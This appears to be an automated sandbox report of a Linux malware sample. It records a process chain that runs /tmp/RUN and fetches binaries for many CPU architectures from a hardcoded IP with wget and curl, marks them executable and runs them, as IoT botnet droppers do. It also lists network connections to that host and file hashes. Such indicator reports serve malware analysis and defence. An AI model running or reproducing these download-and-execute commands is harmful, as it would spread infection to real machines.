[chmod +x RUN arc gdm3-config-err-gfb7nI jack5tr.sh mips mpsl snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm]
/usr/bin/curl
[curl -O http://193.37.59.116/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x RUN arc arm gdm3-config-err-gfb7nI jack5tr.sh mips mpsl snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm5]
/usr/bin/curl
[curl -O http://193.37.59.116/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x RUN arc arm arm5 gdm3-config-err-gfb7nI jack5tr.sh mips mpsl snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm6]
/usr/bin/curl
[curl -O http://193.37.59.116/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x RUN arc arm arm5 arm6 gdm3-config-err-gfb7nI jack5tr.sh mips mpsl snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm7]
/usr/bin/curl
[curl -O http://193.37.59.116/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-gfb7nI jack5tr.sh mips mpsl snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/ppc]
/usr/bin/curl
[curl -O http://193.37.59.116/ppc]
/usr/bin/cat
[cat ppc]
/usr/bin/chmod
[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-gfb7nI jack5tr.sh mips mpsl ppc snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/spc]
/usr/bin/curl
[curl -O http://193.37.59.116/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-gfb7nI jack5tr.sh mips mpsl ppc snap-private-tmp spc systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/m68k]
/usr/bin/curl
[curl -O http://193.37.59.116/m68k]
/usr/bin/cat
[cat m68k]
/usr/bin/chmod
[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-gfb7nI jack5tr.sh m68k mips mpsl ppc snap-private-tmp spc systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/sh4]
/usr/bin/curl
[curl -O http://193.37.59.116/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-gfb7nI jack5tr.sh m68k mips mpsl ppc sh4 snap-private-tmp spc systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]
/tmp/RUN
[./RUN]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
Files
/tmp/x86
| MD5 | c4a3f27654d167d92ac6df60a02b40e2 |
| SHA1 | b1707a6ada4a6538e7595cbbdd2cd3b3d2294166 |
| SHA256 | 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100 |
| SHA512 | ee1fd253404678b44d026310d0ec655057602be0a83d2b9ae6e4eb0c357f74900fcaea430d8ced18d6debb8053bbdf4db39b7900b33080ce735ae87b25317f66 |
/tmp/mips
| MD5 | 038943a024bba0e623ee0fc71c0e9dc4 |
| SHA1 | daaffb7cab5f0b1973d602b1f6d8c8f35600dc0b |
| SHA256 | 28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb |
| SHA512 | 3e6c767298d62657a8217d4258bea76bbbb4abb0b85423045a2eca691399d56952abad3197f501f4bbf71eee2fc30fd017cec58171274bb6021789b597871b07 |
/tmp/arc
| MD5 | 154506d20dcd8502b3820a2912b697e9 |
| SHA1 | 55c207a1c0aeabc6df6d0307f11a03137139d701 |
| SHA256 | 5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c |
| SHA512 | aeeb083e7bc6e5e8701572f91a5731148f1b93ebe3ab2ebd6d10526f08771601d6f79450f22a5cb03b2d05e54a4bb5fde176d541a6cbc5893d64f9b8621c0112 |
/tmp/x86_64
| MD5 | 74eff98ceea934700653d0c0620419f8 |
| SHA1 | 037df252464667dbcdc6f4fde3ff9043a3b76909 |
| SHA256 | 7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89 |
| SHA512 | 81f6a484bf3dddfa9c0b574f207accde90b631545907eb2d15565e6ffdbbb177c5c97733090a0cac83d775007256a4ff67848fbbe95faa19adb199a312a6573c |
/tmp/mpsl
| MD5 | eba2a5a74d5beba7b9f903cfe07f9796 |
| SHA1 | 012af86b452d7e7f82bbd45b5bbef672d2b25c67 |
| SHA256 | 4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea |
| SHA512 | a35aa4ebfab6a69a76a3ea31c52ba27f8a5b306b54ed1f732f18f8ad61f1dea57ea5af0354d604cfdb6769419e0a9a44f10545c1f1a27ad018ec730b9fb480be |
/tmp/arm
| MD5 | 6b1fc0e45d31470659fe0e295bc63d4e |
| SHA1 | ce54569f5eefe03f56d5df2df3fe4830b0c9f177 |
| SHA256 | 6f942d2d27fea02c90ec772b8523891771a1ae6c4f05eecc3e0e3d8fa4776f22 |
| SHA512 | f3a3cc1705764a3be4e725d10ae10710d4a09750e629c8cf07974907ac88858bfa54bc86cca6947e51de468fe654669b751c48ee2e234c53f4f001b29fdb9fea |
/tmp/RUN
| MD5 | 9c1344aa17dc266ff8f8637b2becfc46 |
| SHA1 | 2dedb0abaf75446902f162dc8fc6e9b04fb9a8ee |
| SHA256 | 423e707b0c9e2d015f8f46df9053bbe469f240b7e1b5f9248f3172eecb36e4e4 |
| SHA512 | 382a31d139ee354d0078c06de83a3cce1cfe568c45b0b6b6586e954d0fc048ded37227797fe078ffcdd5539c2f70fd8338b5b6d72fb3a3e7f22230deacbb1da1 |
/tmp/arm5
| MD5 | fc7db008f770f37ccb16e8d23f9780ae |
| SHA1 | acd2865df9fec74fdafb227ce3136b715bb998b0 |
| SHA256 | 857587a2dc176d97becbd0d400804245e392fd87f92bb7ace51865619eb0a7db |
| SHA512 | c0e126cb47cbcd469d7b8b99ae7b5cb4cb25444adb91586acf02c36d9d21f221d897d0c2ba989371ea165a436ed49320219b074e5bb10afd0b2defb4319f097c |
/tmp/arm6
| MD5 | d6227412be050807781b974181739db6 |
| SHA1 | 14d20849fc59a62ed7f713afda3d9dda4cc2c850 |
| SHA256 | e559985c126f6872d3211cd971a7d8a64a6d17e247b5b14d0a7d85f9ad29ce09 |
| SHA512 | 7a58d6d56f24f1064262de862372531e4cb7967373a4253a2ddc631a195373102fbc19178393f9c568b6b977641bf7bf5b283ca11f033f93fdadfa4789bc9c76 |
/tmp/arm7
| MD5 | d0084c21e35f40b71450406d0298e622 |
| SHA1 | f2ce386f6ba9afdb7f95272ab867c913b0802cd9 |
| SHA256 | 9339521da875e8f082bd738ca8dc528d04ec605b19f46da59c55690f3bcd624f |
| SHA512 | 0f6618d607368f2251c48c9daa4d378ca89a6a053c7f5a981ad7e0d9683aa242d12f38b6f476dbbb36abd6ba2d627267cb3b9494bf3c4af40615c440be26f727 |
/tmp/ppc
| MD5 | 9b27ba0a33c0ecaf4c48bc1fdabf2538 |
| SHA1 | d568ee55ba8476a9121f9f9c6dbe4e9e18cbb266 |
| SHA256 | 6ad5fe25bc0730429eb72d60b5e841df775f5a6a08bc1c61edd182c7d9a41618 |
| SHA512 | 1428b89fbf2b432783eeef4e1362c840d92072c73490bef5f6c13e14de1cb8e8260adc323bfd433992be158dfd284ba21cabba3404527638cdbcdbfabd86baea |
/tmp/spc
| MD5 | 839129f80935155dff6a2db49753d6a9 |
| SHA1 | d0f9e58eb29c5fcf88b4bbdfe7e447dd9ed9b8ba |
| SHA256 | 073994fa01d7e8d34a63c9e1a1a45005f52f387c1166768ef419afb911ad5457 |
| SHA512 | ef2ce2ebb97feb7d955cae8f3f85bea2ab02b312efad8580bd7efc92684dc6cb0343c2c8f561ad8c4a9e2e40580585754d0ea214099d37c862629c5bd8b913c3 |
/tmp/m68k
| MD5 | e6391e323b334b1257f36bb2fcb34e25 |
| SHA1 | 1532d7dd78fb0b0263ee0df4ab3d007a68e45c41 |
| SHA256 | 66d4651d0746e2ac8801b370c3600e91354b65746ff6b636930180682a5c1728 |
| SHA512 | b4bad5f003ccec3aaa5f412ffebec85d4fd0ba12d7a53abad056fc4a8ba7392967812b886d32ce2e54d28de018a39c51980a724149ab98b7c23b589a3f631958 |
/tmp/sh4
| MD5 | f26f51b05d46bea29bcab58abb1a9ec1 |
| SHA1 | 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf |
| SHA256 | ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466 |
| SHA512 | b60304f2fb247d8a171490d88183c7b56ab9458c39dae0cbd255145c5e463f5c7d78dbcda73c04f2eb3e33cff003c061473d86bb821d60bac12353506281ccea |